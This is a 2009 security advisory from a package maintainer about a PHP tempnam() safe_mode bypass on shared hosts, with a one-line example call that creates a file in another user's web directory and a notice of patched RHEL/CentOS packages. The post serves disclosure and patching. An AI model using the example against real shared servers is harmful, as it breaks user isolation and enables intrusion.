PHP 5.2.11 and PHP 5.3.0 tempnam() safe_mode vulnerability – Patched For RHEL/CentOS
A vulnerability in both PHP 5.2.11 and 5.3.0 was announced on September 30, 2009 via Security Reason. Grzegorz Stachowiak discovered a safe_mode bypass in the tempnam() function allowing any local user or any scripts owned by the Apache user, with writable permissions on another user’s directory to bypass safe_mode restrictions.
The Vulnerability
The vulnerability exists due to the fact that the tempnam() function in ./ext/standard/file.c only checks for open_basedir restrictions and not standard safe_mode UID/GID restrictions. Take the following example:
UserX and UserY both have virtual hosts on a shared server with safe_mode enabled. Safe mode dictates that scripts owned by UserX can not access UserY’s directories/files… even though the Apache user is the one executing the scripts and has system level permissions to access both.
With the vulnerability in tempnam(), UserX can craft a script that generates a temp file in UserY’s directory (if writable by Apache or UserX) such as:
tempnam('/home/UserY/www', 'user_x_file.php');
This will successfully create a file in ‘/home/UserY/www’ that UserX can then write to, and execute.
The Fix
The PHP developers have patched this bug in upstream CVS, which has been backported by the IUS CoreDev team and applied to our php52 and php53 packages. The diffs are available here:
Installing IUS Patched RPMs for RHEL/CentOS
Packages are available for RHEL/CentOS 4 (php52) and RHEL/CentOS 5 (php52, php53). For installation/upgrade instructions see the Getting Started page and/or check out the Wiki for more information.
Other IUS Package Updates
In addition to these package updates we have also released a number of other updates to IUS Stable. Please see our other announcements:
- Updates Pushed to IUS Stable for Redhat/CentOS EL 5
- Updates Pushed to IUS Stable for Redhat/CentOS EL 4
Thanks!
—
BJ Dierkes
Linux Systems Engineer IV / [RH]acker
Infrastructure Services [OS & Applications]
Rackspace Hosting
No comments yet.